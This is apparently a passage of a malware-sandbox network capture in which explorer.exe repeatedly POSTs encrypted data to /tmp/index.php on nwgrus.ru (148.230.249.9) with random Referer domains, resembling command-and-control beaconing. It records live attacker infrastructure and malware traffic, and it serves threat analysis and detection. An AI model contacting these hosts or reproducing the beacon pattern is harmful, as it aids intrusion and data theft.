Oct 13, 2024 18:27:59.576131105 CEST	311	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 71 14 d0 f5 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuqszsb7\|Z'?=L3uQaQ=W5 (rb> tzHZi<]}81=f0x\|Yy FzOv~#JH
Oct 13, 2024 18:28:00.520693064 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	65005	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:00.531119108 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ofymhpccvbs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 143 Host: nwgrus.ru
Oct 13, 2024 18:28:00.531119108 CEST	143	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 5a 33 c8 99 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuZ3t-pLq"A-=@T\</8\|
Oct 13, 2024 18:28:01.491563082 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:01 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	65016	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:01.509685040 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bysfflokkqfepm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 225 Host: nwgrus.ru
Oct 13, 2024 18:28:01.509685040 CEST	225	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 4a 26 bb e8 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuJ&W)`_3_FY\|$[MTfvN5'$!'8}BNM0nfKND2Zx3I:;>r/U1
Oct 13, 2024 18:28:02.469595909 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	65022	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:02.677640915 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jktwhgejoiledxll.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: nwgrus.ru
Oct 13, 2024 18:28:02.677666903 CEST	150	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2c 5f b3 f4 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu,_]\|{M2WK*b"(JXIC0.[nPJu<v
Oct 13, 2024 18:28:03.625276089 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	65028	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:03.634772062 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dixscrvatda.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Oct 13, 2024 18:28:03.634807110 CEST	131	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 37 32 cf f7 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu72VvDcYs~tCR<f_C)pkj
Oct 13, 2024 18:28:04.591512918 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:04 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	65034	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:04.602816105 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mjtbwlnoxuan.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: nwgrus.ru
Oct 13, 2024 18:28:04.602850914 CEST	293	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 75 5c ac 97 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuu\(SK2w&t8i%uh[WL0m7/i,IU!mPe6OQ:cx2f,zFbFrfpGrZ9
Oct 13, 2024 18:28:05.563189983 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	65046	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:05.572858095 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sndnvyniffwfhh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: nwgrus.ru
Oct 13, 2024 18:28:05.572884083 CEST	279	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 62 08 b1 90 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vub2tbbtQOs-fAwCI '{H;n@igo#b@ H)FOX!@"]z"Utf/5Cs*]&l
Oct 13, 2024 18:28:06.520082951 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	65052	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:06.529167891 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vedtfnbjotxnqis.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 259 Host: nwgrus.ru
Oct 13, 2024 18:28:06.529226065 CEST	259	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 57 2a d4 e7 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuW*0m]RtSMnnnysv-HEK\AU1&a@I1Bz]]u5YHrYQ>"NJt^L
Oct 13, 2024 18:28:07.527420044 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	65058	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:07.604176044 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ijwwxiabyxki.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 154 Host: nwgrus.ru
Oct 13, 2024 18:28:07.604176044 CEST	154	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 3d 1e a7 e4 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu=w8NcHZ*VPug)~@o"Cjmz<K
Oct 13, 2024 18:28:08.549442053 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:08 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	65064	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:08.561347961 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wqfylsyerupgn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 115 Host: nwgrus.ru
Oct 13, 2024 18:28:08.561381102 CEST	115	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5b 3e d3 a1 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu[>c}hs`jR;f)/
Oct 13, 2024 18:28:09.502774000 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	65070	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:09.548398018 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oqlpckrtfgisr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 220 Host: nwgrus.ru
Oct 13, 2024 18:28:09.548398018 CEST	220	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3d 52 a2 be Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu=Rz6xYivOP3dY_c\B;GO~[J!Mm\'-{i!5;wvHS61J{.
Oct 13, 2024 18:28:10.463885069 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL 